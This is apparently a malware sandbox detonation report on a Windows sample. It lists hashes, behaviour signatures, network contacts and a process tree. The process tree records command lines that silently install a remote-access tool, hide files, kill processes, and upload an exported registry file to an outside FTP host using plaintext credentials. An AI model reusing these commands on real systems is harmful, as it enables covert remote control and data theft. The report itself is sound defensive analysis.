| SHA256 | 708ccc3654ced3ad1ebc917d0ae48ba3635464de9b71b05441e2e68526b32f8d |
| SHA512 | 334103136d264a4bf34172a6021582b16856b0e4bcceb958a72a62e92854832fd8620b988922c3b8eb6ae376df84ba4e654cc858ee96eb860ff88089a90ef41b |
C:\Users\Admin\AppData\Local\Temp\fcp.exe
| MD5 | d86fd26b2340cead820b2a905c177c63 |
| SHA1 | 313334f1d8e1a8a9c7473dead0a839c3f9855b86 |
| SHA256 | 6ece2458ddfc2bc9be6d14d1c377b2a52bf502f3757ba8024de383d85899e21b |
| SHA512 | b3dc478779d0e2a93e8fcac0e0a34e3737c8a08b0479203c73fda8f3e3345618d06485a070f17cc6d880d07c3436af4b4ba8df29dc184b0717f3a2753cbb6413 |
C:\Users\Admin\AppData\Local\Temp\pthreadGC.dll
| MD5 | 2d6a905cbe6766adf6da9d4f5a461571 |
| SHA1 | 4700349f065e96c40eb5f50aff554bf5b2eb2c21 |
| SHA256 | d47dc7d06a2873c65758568a16aee0349d87de35d8d6e7c4249f1276e81f14fa |
| SHA512 | 84e79aa2cf1d7d1d31224572f193ce5527504fb58ef79aa5e4fb672188b9dae4a5ebb4e1ba3a7d2958a0a43095023ed9ba2d36604570575fdd594d9b42786848 |
memory/5148-218-0x0000000000400000-0x0000000000452000-memory.dmp
memory/5148-219-0x000000006B700000-0x000000006B70B000-memory.dmp
memory/5320-220-0x0000000000400000-0x000000000107A000-memory.dmp
memory/5432-222-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/5320-224-0x0000000000400000-0x000000000107A000-memory.dmp
memory/5432-226-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/5320-227-0x0000000000400000-0x000000000107A000-memory.dmp
memory/5320-231-0x0000000000400000-0x000000000107A000-memory.dmp
memory/5432-233-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/5320-241-0x0000000000400000-0x000000000107A000-memory.dmp
memory/5432-243-0x0000000000400000-0x0000000000F11000-memory.dmp
memory/5320-251-0x0000000000400000-0x000000000107A000-memory.dmp
memory/5320-262-0x0000000000400000-0x000000000107A000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-20 14:06
Reported
2025-05-20 14:08
Platform
win10v2004-20250502-en
Max time kernel
149s
Max time network
144s
Command Line
Signatures
RMS
Rms family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\System\123.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\System\id.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\id.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4216 set thread context of 4820 | N/A | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 2160 set thread context of 824 | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\id.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings | C:\Program Files (x86)\System\id.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
"C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\test.vbs"
C:\Program Files (x86)\System\123.exe
"C:\Program Files (x86)\System\123.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files (x86)\System"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe
"C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /firewall
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /start
C:\Program Files (x86)\System\rutserv.exe
"C:\Program Files (x86)\System\rutserv.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe" /tray
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe"
C:\Windows\SysWOW64\regedit.exe
regedit.exe -ea C:\backup.reg "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"
C:\Program Files (x86)\System\id.exe
"C:\Program Files (x86)\System\id.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\id.vbs"
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe" /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\id.bat" "
C:\Users\Admin\AppData\Local\Temp\fcp.exe
fcp --user="x95244d7_fgsdfg" --pass="9pKpGW4W" --server="x95244d7.beget.tech" --file=C:\backup.reg
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ivgenyroman22.hhos.ru | udp |
| US | 8.8.8.8:53 | rmansys.ru | udp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| US | 8.8.8.8:53 | hunter13.beget.tech | udp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 77.223.119.187:5655 | rms-server.tektonit.ru | tcp |
| GB | 2.16.153.209:443 | www.bing.com | tcp |
| GB | 2.16.153.209:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | x95244d7.beget.tech | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
Files
C:\Program Files (x86)\System\install.vbs
| MD5 | 316840cd95d80c8c879e0812a39e8151 |
| SHA1 | 6b1b804219c028c18311dd5c273b0cc3730c8044 |
| SHA256 | 4631bc6d3ff7b81435f2451251dce0de99e0d72a9a9f7f024d001e11663cda34 |
| SHA512 | 2295924c9a98fe19432df62503ddd18afb2c0af16168a8c276be4c3cf08ce1d98f1441e0a2a9d0ad68c4f3d843de00084a2303cd268791f25ce25a12d9b90036 |
C:\Program Files (x86)\System\test.vbs
| MD5 | 7673f4b5eeccb819272231a4ea32754d |
| SHA1 | 6b1270c4eee7083932833ff9809eae34d50f5b51 |
| SHA256 | 95d605965a9f5b1a7e668156bdb0a6ba4b90a98c6337763eb4acd3bee80ea005 |
| SHA512 | 75f7505f167947ef0cd413c84dc587692450c3db5c03cde95a4712478791ff49afde135f31331e2c138913c728148c34860b7d2424db981625f299762ec8352e |
C:\Program Files (x86)\System\install.bat
| MD5 | cf76cadc2887b23aab4f1f2330968548 |
| SHA1 | f8f9495ff2e52e0a2dd218a56f5ec8b723f030a9 |
| SHA256 | d8e903d6fc11b4c05e3999d0c21fdcce6a4136e36846b0d79bb05a9cea33c2ef |
| SHA512 | 05ce5498dc762a5987ac3070b6da321e9cedced6f67fbd1929e3a6abf951b31331537e45ab64d4838204abc25f21c86d729fa2ff59b05db9aa661681937bc4b7 |
C:\Program Files (x86)\System\123.exe
| MD5 | 3b084c7f7c666af58971760174c8f32b |
| SHA1 | b9a21429c6d35abf31eae7235dd3152beaf270fb |
| SHA256 | 3bd176991ba3ae028d32f049636fb6db808b182c8551465479583e93d864be96 |
| SHA512 | d19ee5d530475996959efa6b07bbf941e281fa310bcb9be3863f3af38c8f938d86648fd9f776032a3170dd59a0162a54a5ea28698e65ceb683e41732d21b880c |
C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe
| MD5 | bc1b34ecfd1bf476402de205363f6372 |
| SHA1 | 2e97b088b30784c022ae556033d03b4c37b22573 |
| SHA256 | e282df4525b8e9a4ed45f48a708059c94a95709f6e4e9fc502a694047ae818a1 |
| SHA512 | 6510705430305656c90f07e46138226cdefaaa2f7699833e010e0cd65ebaefb1dab8406efe573c90b61179f79fc5a80e5e2a06976c534b64918ff94d197cc9b1 |
memory/4216-58-0x0000000000ED0000-0x0000000000FA8000-memory.dmp
C:\Program Files (x86)\System\regedit.reg
| MD5 | fd06d4b501d310100f720d34ce0f7f2a |
| SHA1 | 4a0fedfda6a84c4e1ac6130a837a136947a82dd1 |
| SHA256 | 27997b89ef17f13a84c26cc3a3f7b4b1c6fc782f7257de05fcb204819897d8a3 |
| SHA512 | 9c6e0f09b490ee6b39f8ecd8df1058c5986295148c513a52cdc67da098ee72120db1c7ebc3ca864c7c3dd7ffb196bc2b5289ae06806db2e888dfa5788bf5ed91 |
memory/4216-60-0x0000000007DD0000-0x0000000007E6E000-memory.dmp
memory/4216-61-0x0000000008560000-0x0000000008B04000-memory.dmp
memory/4216-62-0x00000000081D0000-0x0000000008262000-memory.dmp
memory/4216-63-0x0000000001A40000-0x0000000001A4A000-memory.dmp
memory/4216-64-0x000000000AFB0000-0x000000000B04C000-memory.dmp
C:\Program Files (x86)\System\rutserv.exe
| MD5 | b097e79d33b826d728c3bcf635d0c382 |
| SHA1 | dc98020d4feec4dd72754f728a8505f27329561e |
| SHA256 | ba3d97e0051836aad5b6002ce7b00f120bc1b57efbc74ff042f80cd2ba59e96f |
| SHA512 | 0cb3e0db0d07c70eb320707f920bb6ddd09407ab33278498383805275df7bc9e6127049d2336bc6a8eef74e7b171af2f73eff8663f27f304cb8046301da71a64 |
memory/1952-68-0x0000000000400000-0x000000000107A000-memory.dmp
memory/4216-69-0x0000000005A50000-0x0000000005AEC000-memory.dmp
memory/4216-70-0x0000000005B00000-0x0000000005B0A000-memory.dmp
memory/4820-74-0x0000000000400000-0x0000000000492000-memory.dmp
memory/4820-76-0x0000000000400000-0x0000000000492000-memory.dmp
memory/4820-73-0x0000000000400000-0x0000000000492000-memory.dmp
memory/4820-72-0x0000000000400000-0x0000000000492000-memory.dmp
memory/4820-71-0x0000000000400000-0x0000000000492000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
| MD5 | 12789da76cc8737b715ffc82dc4be837 |
| SHA1 | c42ce86a036cf61c781731f4baf59b1deafaee3a |
| SHA256 | f34e1e970161c9b7a8a57e164fbd227265cc4d15d2a4b0bdb130f0c1f1bd8235 |
| SHA512 | bdcc89d7bad9899403d4396bb309ca2650de44caf3a35e1062a435077d415a5f103485a7c48bb2809673cff31ff5cd612e85a5f1fe491e7a14a2952ebcb8cf76 |
C:\Users\Admin\Desktop\Key\Key.txt
| MD5 | 7fa85ee66ad3c37306e01a041e48adff |
| SHA1 | a4a56aae1b0979bf72d32df5ed0cdfb33326c7cb |
| SHA256 | 7646355a353d254d4763f35d8859b87a2fb8e9508c7f3f60049fb97e79bc61a0 |
| SHA512 | fce7d75319a4102974d052176d0265bfdeceedca7c2cd35fc34dff9222d3bf49160182a35d1e3f9773a6b38e2c0d47b068dee6e3ec9ea6a769383d654a284802 |
memory/2160-96-0x0000000000E20000-0x0000000000E66000-memory.dmp
memory/1952-95-0x0000000000400000-0x000000000107A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{a8aw6353}.txt
| MD5 | ee463e048e56b687d02521cd12788e2c |
| SHA1 | ee26598f8e8643df84711960e66a20ecbc6321b8 |
| SHA256 | 3a07b3003758a79a574aa73032076567870389751f2a959537257070da3a10d8 |
| SHA512 | 42b395bf6bd97da800385b9296b63a4b0edd7b3b50dc92f19e61a89235a42d37d204359b57d506e6b25ab95f16625cce035ed3b55ef2d54951c82332498dab0f |
memory/2160-121-0x0000000002F80000-0x0000000002F8E000-memory.dmp
memory/60-123-0x0000000000400000-0x000000000107A000-memory.dmp
C:\Users\Admin\AppData\Roaming\ptst1Y7Q9P7V7Q1Y7Q9P7V7Q\General\cards.log
| MD5 | 833406139ec477aabb10628c3b5e75c7 |
| SHA1 | b303b77b367d401e9900bec03e33a2cfb846b7e4 |
| SHA256 | f8d5bf0b8b53fc90f9224504e0a488360c79929eb1c9ee3436d73daa611f17c0 |
| SHA512 | 76f1bae11ab39ea64b2a1daea8aefb56d42e79f8076c31fac27c5d535c28c6cec0dc6ec1dfe9302de5c77706965860ca92fdfb1e915e3a2e9292aec7ef887bd4 |
memory/2160-141-0x0000000002E50000-0x0000000002E5E000-memory.dmp
memory/824-143-0x0000000000400000-0x0000000000408000-memory.dmp
memory/824-142-0x0000000000400000-0x0000000000408000-memory.dmp
memory/824-147-0x0000000000400000-0x0000000000408000-memory.dmp
memory/60-170-0x0000000000400000-0x000000000107A000-memory.dmp
memory/2744-175-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1048-174-0x0000000000400000-0x000000000107A000-memory.dmp
memory/552-177-0x0000000000400000-0x000000000107A000-memory.dmp
C:\Program Files (x86)\System\vp8decoder.dll
| MD5 | 88318158527985702f61d169434a4940 |
| SHA1 | 3cc751ba256b5727eb0713aad6f554ff1e7bca57 |
| SHA256 | 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74 |
| SHA512 | 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff |
C:\Program Files (x86)\System\rfusclient.exe
| MD5 | e96a511519df1055c9b564646a752b2d |
| SHA1 | e75b47954faf9ddd643b23110deca10164f571a0 |
| SHA256 | 3527e45b4ceec9f6526b5ba17d865395e1326f1ede774b0d6487a2146218613a |
| SHA512 | f5b99203d083935aeb4ba2ff1490d4d854afdb5c6ab294b239b8992866cbb5747298531f9e3e8353d64c3d248b0faf128c3f7e79249a30462c3991fbcdd76fc6 |
C:\Program Files (x86)\System\vp8encoder.dll
| MD5 | 6298c0af3d1d563834a218a9cc9f54bd |
| SHA1 | 0185cd591e454ed072e5a5077b25c612f6849dc9 |
| SHA256 | 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172 |
| SHA512 | 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe |
memory/1048-182-0x0000000000400000-0x000000000107A000-memory.dmp
